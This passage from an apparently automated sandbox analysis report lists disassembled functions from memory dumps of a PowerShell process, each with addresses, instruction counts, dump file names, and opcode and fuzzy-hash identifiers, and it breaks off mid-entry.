                                                                                              • Opcode ID: 656b490d21a6afe0e22551dc14a90494968269d147f0992d48573640636df72b
                                                                                              • Instruction ID: a3d7f36dc364ca7fb672560e26c702de2371d0c7d07a68fbf0f6e2569dbb2584
                                                                                              • Opcode Fuzzy Hash: 656b490d21a6afe0e22551dc14a90494968269d147f0992d48573640636df72b
                                                                                              • Instruction Fuzzy Hash: E2227174B40215DFEB24CB58C950BA9BBA2EFD4304F14C4A9D90AAB351DB71ED82CF91
                                                                                              Function 07937505 Relevance: .5, Instructions: 475COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2519750612.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7930000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c75795946ea83cb758d847619ec1d6862ba55ed4b93b8bca405c0c4cefa0c16f
                                                                                              • Instruction ID: 78b698d29c493862e84b3adcad3bc7fd1ae152d818535b2e0ff3de4b4f67ce1f
                                                                                              • Opcode Fuzzy Hash: c75795946ea83cb758d847619ec1d6862ba55ed4b93b8bca405c0c4cefa0c16f
                                                                                              • Instruction Fuzzy Hash: 74123CB4A01205DFEB14CB98D584F69BBB6EF89708F14C069E816AF355DB72EC42CB41
                                                                                              Function 07936F28 Relevance: .5, Instructions: 466COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2519750612.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7930000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b37f8ca21db3801bd86d0e0a881a4d2f879fcd0877dea162d183398512576020
                                                                                              • Instruction ID: 6f33e9f7c4557ec1bbfab17e20a9c089330f414e8c056de725be875e276f8c0a
                                                                                              • Opcode Fuzzy Hash: b37f8ca21db3801bd86d0e0a881a4d2f879fcd0877dea162d183398512576020
                                                                                              • Instruction Fuzzy Hash: 811239B4A01205DFDB24CF98D584E69BBB6FF89708F14C069E81A9B355C772EC42CB41
                                                                                              Function 04E7D690 Relevance: .4, Instructions: 362COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2472618466.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_4e70000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 343fb261ccb0053b2a245a6a62e57a3f0e8a28a714278fbcd9c3908409faae53
                                                                                              • Instruction ID: 64085cd04e61631192724a5815e84bdef9e31da5df8e77c7f7515f59c1925a08
                                                                                              • Opcode Fuzzy Hash: 343fb261ccb0053b2a245a6a62e57a3f0e8a28a714278fbcd9c3908409faae53
                                                                                              • Instruction Fuzzy Hash: A7E13974A04248DFDB05CFA8C894ADDBBB1FF89324F14915AE844AB356D735ED81CB90
                                                                                              Function 04E7DF68 Relevance: .3, Instructions: 333COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2472618466.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_4e70000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2ab3ff6003686d7f778103bd1ea03161287b0bdce5b6fd0918db9b30f9c864e4
                                                                                              • Instruction ID: 19bfcddb1daaa0e5b57549ea9593aeba18ea18fb9b30404c69b34aa78b30b925
                                                                                              • Opcode Fuzzy Hash: 2ab3ff6003686d7f778103bd1ea03161287b0bdce5b6fd0918db9b30f9c864e4
                                                                                              • Instruction Fuzzy Hash: C2D11B34A01248DFDB15CFACD484A9DBBF2EF89324F258199E805AB361DB71ED41CB90
                                                                                              Function 085E273F Relevance: .2, Instructions: 230COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2522895077.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_85e0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c64c58015ec92967453bb5d5e5dab370b13a676204ba5a77b7c014b1bdbaec74
                                                                                              • Instruction ID: 8e64ff8c9625f2e7e8ddc12db07e0bb0a259f6deaa1e8f5057803839f32408fd
                                                                                              • Opcode Fuzzy Hash: c64c58015ec92967453bb5d5e5dab370b13a676204ba5a77b7c014b1bdbaec74
                                                                                              • Instruction Fuzzy Hash: 88C1BDB4D01669CFDB68DF24CC8879EBBB6BB88302F0045EAE409A3255DB754AD5CF41
                                                                                              Function 078A57F8 Relevance: .2, Instructions: 223COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2519178972.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_78a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9c62b5aae2482a982d9fcf2bb13d3f6aaba1193eae0431ed455a8e3169b75559
                                                                                              • Instruction ID: 66add8bd8de8052c603210df4ff7ae03a78e30a4302ca130f19a93cd3b08a31c
                                                                                              • Opcode Fuzzy Hash: 9c62b5aae2482a982d9fcf2bb13d3f6aaba1193eae0431ed455a8e3169b75559
                                                                                              • Instruction Fuzzy Hash: 2F81C2B0700209EFEB14CF59C544AAE77E6AF94365F188069E805DB394DB31EDE1CBA1
                                                                                              Function 085EFB38 Relevance: .2, Instructions: 212COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2522895077.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_85e0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b861ea09ed71e3889cec0c8c9f728082683eb4e859b2421b129a3d6ad1650eba
                                                                                              • Instruction ID: 5be217738dfbb26d388fec74731d33234009dea2b90f25d7242a551171b8bae3
                                                                                              • Opcode Fuzzy Hash: b861ea09ed71e3889cec0c8c9f728082683eb4e859b2421b129a3d6ad1650eba
                                                                                              • Instruction Fuzzy Hash: 5AA1A3B4E002199FCB14CFA9D984ADDBBF2FF88310F148469E959AB351DB31A951CF50
                                                                                              Function 07936600 Relevance: .2, Instructions: 198COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2519750612.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7930000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 18df270ad29ae6536ffe1f64f1e4efa499ef238e13ebf0008894a4bd692dda15
                                                                                              • Instruction ID: 5b29b698b50f8d60b307576178f8689a4165c461a419845754e0b224044a8704
                                                                                              • Opcode Fuzzy Hash: 18df270ad29ae6536ffe1f64f1e4efa499ef238e13ebf0008894a4bd692dda15
                                                                                              • Instruction Fuzzy Hash: 975146B1704346EFDB249B79981036ABBEAAFC621DF24847BC546CB381DE71D841C7A1
                                                                                              Function 0793D674 Relevance: .2, Instructions: 176COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2519750612.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7930000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3c98426ff711d8e54e6f91849079ccd5b3d25078d5ea3117f96c556f65e2527a
                                                                                              • Instruction ID: edcdfb6c5f8a1909ed5c6263636c99d29460d797f9c7dc5dfca36a4bfdd7b9e1
                                                                                              • Opcode Fuzzy Hash: 3c98426ff711d8e54e6f91849079ccd5b3d25078d5ea3117f96c556f65e2527a
                                                                                              • Instruction Fuzzy Hash: 4851F6B0B00201DFDB14CF54C860AADBBAAAFC1359F5580AAE9059F391C731ED41C791
                                                                                              Function 0AA60680 Relevance: .2, Instructions: 165COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2614874909.000000000AA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA60000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_aa60000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c186bd3c2af57cc0688298fa6d01bef1a03c2cae58259c510f52aeefdc77e740
                                                                                              • Instruction ID: b7a2674028a7ec758c317bb694ecbfe689132e9ff5ec580513aab4a0f496a281
                                                                                              • Opcode Fuzzy Hash: c186bd3c2af57cc0688298fa6d01bef1a03c2cae58259c510f52aeefdc77e740
                                                                                              • Instruction Fuzzy Hash: 2661E1B4D06209EFDB54CF99D488BEEBBB6FB89300F109029E505B7291D7B45A85CF90
                                                                                              Function 0AA60671 Relevance: .2, Instructions: 161COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2614874909.000000000AA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA60000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_aa60000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 86649aa23d8f731c70f911f1ad16831b4476f9054686156393512b09abb62ff2
                                                                                              • Instruction ID: e6111d18cd8593b4d2e9b1457c272129a4dff6a438437c209fa314bd8bb82612
                                                                                              • Opcode Fuzzy Hash: 86649aa23d8f731c70f911f1ad16831b4476f9054686156393512b09abb62ff2
                                                                                              • Instruction Fuzzy Hash: E5610274D06209DFDB54CF99D488BEEBBB2FB89300F14902AE505B7291D7B45A85CF90
                                                                                              Function 07939A44 Relevance: .2, Instructions: 159COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2519750612.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7930000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5fa1c4ad2d4c0504e8994a49305328d17955ffba5f2904f979a902e772ca7ef5
                                                                                              • Instruction ID: c2321bdcc8b0e993c9f8bf312eb722d2eee6ad101c25b6911d69068ceb8a46ab
                                                                                              • Opcode Fuzzy Hash: 5fa1c4ad2d4c0504e8994a49305328d17955ffba5f2904f979a902e772ca7ef5
                                                                                              • Instruction Fuzzy Hash: A551D2B0B04205DFDB149F18C445BA9BBFAAF8523CF14C4A6E5199B291CBF1ED41CB61
                                                                                              Function 078A0488 Relevance: .2, Instructions: 157COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2519178972.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_78a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bbfc257310f5cb8e8c44f4513003b97c65537abc335acabf173f4ff3edc61462
                                                                                              • Instruction ID: 090ab74e799f853368e2a3e66630296902c81f415c915555903a3ee9b0f0fdd4
                                                                                              • Opcode Fuzzy Hash: bbfc257310f5cb8e8c44f4513003b97c65537abc335acabf173f4ff3edc61462
                                                                                              • Instruction Fuzzy Hash: B7517AB0B04305AFEF219B74881077E7FA5AFD1218F54806AD545DB292FF35C841C7A2
                                                                                              Function 07939B05 Relevance: .1, Instructions: 145COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2519750612.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7930000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 50d81002cd3d155ef15d0a8afb647b10fb1edc054717e8daf8dafd7447efe82e
                                                                                              • Instruction ID: bb85f308cbd68c4369dcbcad36570d0cb51bd3539aa5340389227da3f6f25336
                                                                                              • Opcode Fuzzy Hash: 50d81002cd3d155ef15d0a8afb647b10fb1edc054717e8daf8dafd7447efe82e
                                                                                              • Instruction Fuzzy Hash: 0051DFB0B04205DFDB148F29C445BA9BBFAAF8523CF18C496E5199B295CBF1EC41CB51
                                                                                              Function 07934890 Relevance: .1, Instructions: 128COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2519750612.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7930000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 18f03d2c9c84e4653e8ec9166f56b540b6efbd354f8c3bbfb27b10581825b38a
                                                                                              • Instruction ID: d01fd566ebc87b8cd09b24b6ebb9050ba9da5447f1d6cdfa99c7c97662acd14b
                                                                                              • Opcode Fuzzy Hash: 18f03d2c9c84e4653e8ec9166f56b540b6efbd354f8c3bbfb27b10581825b38a
                                                                                              • Instruction Fuzzy Hash: BB414E70B00395AFDB205B689C10B3EBFA9AF85B18F15845AE545DF2D5CB71DC01C3A2
                                                                                              Function 07936870 Relevance: .1, Instructions: 125COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2519750612.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7930000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4c5d79e9812f6038ec62ec0c587f1955f615f6e17ddbe6ae74a11eb257cebb62
                                                                                              • Instruction ID: e850c9e0ded3490e7a1fb3000e89b959d1b8f7737d08208779eb3365a02d3899
                                                                                              • Opcode Fuzzy Hash: 4c5d79e9812f6038ec62ec0c587f1955f615f6e17ddbe6ae74a11eb257cebb62
                                                                                              • Instruction Fuzzy Hash: 094146B5B00215EBDB149B7988002AEFBE9AFC4318F24846AC915DB341DF32DE01C7E1
                                                                                              Function 04E7D121 Relevance: .1, Instructions: 120COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2472618466.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_4e70000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d16a4684a07014ef8b6c15af3e11d4ca2555c1d78aaa7104a5ad1b2261ea473a
                                                                                              • Instruction ID: 702a6e993ae15ac0f22e6c6108f91576bf2cfd9bc8f1c58cd44dc0da23e0834b
                                                                                              • Opcode Fuzzy Hash: d16a4684a07014ef8b6c15af3e11d4ca2555c1d78aaa7104a5ad1b2261ea473a
                                                                                              • Instruction Fuzzy Hash: 9751B774A00209DFDB14CBA8D884AADFBF2BF88314F24D159E405AB355DB75ED86CB90
                                                                                              Function 085E0736 Relevance: .1, Instructions: 116COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2522895077.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_85e0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5ef6ec78671b6408edefc557a823afc8306d9b221249ec3f262c0dc62416239a
                                                                                              • Instruction ID: 57570b6a4c6737a81ebcc6ae9fa2f73beb475c03401c95a032df4afd13bae106
                                                                                              • Opcode Fuzzy Hash: 5ef6ec78671b6408edefc557a823afc8306d9b221249ec3f262c0dc62416239a
                                                                                              • Instruction Fuzzy Hash: FF414934B0CA15DBDB4C9B68DC9457DB7F2BB88206714885AF407EB3C1DAB19D078B92
                                                                                              Function 07939E08 Relevance: .1, Instructions: 106COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2519750612.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7930000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d80b872be1295f5166acfcfda50e8cc21740efb734a8a75548fe6dc6c2e90c73
                                                                                              • Instruction ID: 821d1038dfe882f1b3458d04639913bec0567e12322f9a222005d68b5b6a5850
                                                                                              • Opcode Fuzzy Hash: d80b872be1295f5166acfcfda50e8cc21740efb734a8a75548fe6dc6c2e90c73
                                                                                              • Instruction Fuzzy Hash: 8731A0F0A0820ADFDF349E15C545B6977AEAB8137DF04816AE8098B251D7B0ED40C796
                                                                                              Function 078A59E0 Relevance: .1, Instructions: 105COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2519178972.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_78a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 17b9c08980af5e9ca309409939631613cc6a45b7872fcac27770f6c0776068a9
                                                                                              • Instruction ID: d70cd511eb80073f4f5ade27a3fc6e367795bc30b8e9e67af01c35c2d429885a
                                                                                              • Opcode Fuzzy Hash: 17b9c08980af5e9ca309409939631613cc6a45b7872fcac27770f6c0776068a9
                                                                                              • Instruction Fuzzy Hash: 6E41BC74700208EFDB04DF98C590A9EBBE6FBC8754B258058E906EB354CB71FD518BA1
                                                                                              Function 04E7D645 Relevance: .1, Instructions: 99COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2472618466.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_4e70000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1394f5e74e844115dae4d9115f0f209a68f9a64b7f1e68c57e3d089278e70387
                                                                                              • Instruction ID: 829bba9ba3d86aef704affdd64bcbacbb0e6393f9cd19815ccb1df37bec96163
                                                                                              • Opcode Fuzzy Hash: 1394f5e74e844115dae4d9115f0f209a68f9a64b7f1e68c57e3d089278e70387
                                                                                              • Instruction Fuzzy Hash: 6441B2759092989FCB01DF5CC8909AABFB1FF4A314B15409AD549EB3A3D730EC45CBA1
                                                                                              Function 078A0467 Relevance: .1, Instructions: 95COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2519178972.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_78a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6845fe9e0a5039b9a00735741135c9d9c2eb6832286162cb0780e0604de66468
                                                                                              • Instruction ID: bb81b1a5065b530d6b9adb8015608b8aa153f93b53c8a6f802af10d9ea454789
                                                                                              • Opcode Fuzzy Hash: 6845fe9e0a5039b9a00735741135c9d9c2eb6832286162cb0780e0604de66468
                                                                                              • Instruction Fuzzy Hash: 603135F0A05306BFEF208E24851077D7FA5AFA2258F54406AD845EB2D2FB35C481CBA2
                                                                                              Function 078A640B Relevance: .1, Instructions: 93COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2519178972.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_78a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a66b2e3933a567a095d9e81e834576e6ee2efb58fe43c61133daee19513b266b
                                                                                              • Instruction ID: 00ebbd1aa211750d21767b039b51c688c5da354b3ae7850e548d02aeb3e5251d
                                                                                              • Opcode Fuzzy Hash: a66b2e3933a567a095d9e81e834576e6ee2efb58fe43c61133daee19513b266b
                                                                                              • Instruction Fuzzy Hash: CC318EF0B0520AEFEF258F24C944BA97FA1AF65714F0C80A6E015CB199F770D940CB51
                                                                                              Function 085E16CD Relevance: .1, Instructions: 88COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2522895077.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_85e0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 197bcb1d48bd6ab5ad3f2ad39c7cf2d4d7ca600ee018ee50c89d11ca5c580190
                                                                                              • Instruction ID: 1e2a30b832eee6176235673984918dc15dc0bb9a6667d98a014cf829c5f39864
                                                                                              • Opcode Fuzzy Hash: 197bcb1d48bd6ab5ad3f2ad39c7cf2d4d7ca600ee018ee50c89d11ca5c580190
                                                                                              • Instruction Fuzzy Hash: 1E316FB0D45748DFD705DFA8D84839EBFB1FF06306F1194AAD505A7282E7384A89CB61
                                                                                              Function 07936850 Relevance: .1, Instructions: 81COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2519750612.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7930000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 68c86a96e8b4b41ac2be671fee5863026a2ab748c06865c47db0025954b6a12b
                                                                                              • Instruction ID: 0e35fbdef9180771edb30c6df38d09755dfe1db599d7e56d65e79b7b4a9d1cef
                                                                                              • Opcode Fuzzy Hash: 68c86a96e8b4b41ac2be671fee5863026a2ab748c06865c47db0025954b6a12b
                                                                                              • Instruction Fuzzy Hash: EE212BB1A00359EFCB149F7984001BABFF4EF8A324B2545A6C855DB355D7359D41CBE0
                                                                                              Function 085E0609 Relevance: .1, Instructions: 80COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2522895077.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_85e0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8d8abe6046e47c7a261a9e1ac4ef57d2d1c17cbb3c8c394195189d0f7357feef
                                                                                              • Instruction ID: eb005aeab50db98ccecd422d8565a6514ce64b24a840b39bd96780068cf0bf70
                                                                                              • Opcode Fuzzy Hash: 8d8abe6046e47c7a261a9e1ac4ef57d2d1c17cbb3c8c394195189d0f7357feef
                                                                                              • Instruction Fuzzy Hash: 4D31E8347001059FD744DB98D89096EB7A3EBC9228B28D05ADD1AEB395CA36EC13CB90
                                                                                              Function 0AA43767 Relevance: .1, Instructions: 80COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2614600100.000000000AA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_aa40000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 08256df1e5cb399d503c8434dbaad3f3cf9634b4e1059c6eb3da49004104a753
                                                                                              • Instruction ID: 75ee89273eece3467f20d3ac9a0e6831f0984eb0b15f0534d4031b3a9351a7a8
                                                                                              • Opcode Fuzzy Hash: 08256df1e5cb399d503c8434dbaad3f3cf9634b4e1059c6eb3da49004104a753
                                                                                              • Instruction Fuzzy Hash: 5631F8B4E04209DFDF04DFAAD8447EEBBF2EB89301F108469E505A7381EB7959458FA1
                                                                                              Function 07934BCB Relevance: .1, Instructions: 79COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2519750612.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7930000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 44b5a791b6706f208f7b37c58d07dddc1471d546ffba5d60a164fe96dbbe56e1
                                                                                              • Instruction ID: c8e84d8ae9bb18aaa8c0e4913d82bcfc38f83a3be7807d6b8419ff603ea0482e
                                                                                              • Opcode Fuzzy Hash: 44b5a791b6706f208f7b37c58d07dddc1471d546ffba5d60a164fe96dbbe56e1
                                                                                              • Instruction Fuzzy Hash: AF2154F160538A8FE7158E04DC409F1BBB9EF92268B1A8067D40CCB272EB75CC01CBA1
                                                                                              Function 085E16E8 Relevance: .1, Instructions: 78COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2522895077.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_85e0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1726b60beea679c01619a59f40d9e3ba66f8f6c24cd967d3e1be48f7f40e3a1e
                                                                                              • Instruction ID: fa0a04383495a8230ed328a6e33ab2216211a943463775660374decbaf757c7d
                                                                                              • Opcode Fuzzy Hash: 1726b60beea679c01619a59f40d9e3ba66f8f6c24cd967d3e1be48f7f40e3a1e
                                                                                              • Instruction Fuzzy Hash: EE316BF0D41608DFD708DFA8D8883AEBBF5FB09306F1094A9D515A7341E7784A89CB61
                                                                                              Function 04D7D0E4 Relevance: .1, Instructions: 74COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2472151517.0000000004D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D7D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_4d7d000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0802c63f76cdf44064af378794e2ab31c45e3ab242b0f9bc18197dc5ce89a0c8
                                                                                              • Instruction ID: f8e30f1b7fdc05f909cddfb9b1f1c4eba719b8ade1160ffd9e256cce652aa111
                                                                                              • Opcode Fuzzy Hash: 0802c63f76cdf44064af378794e2ab31c45e3ab242b0f9bc18197dc5ce89a0c8
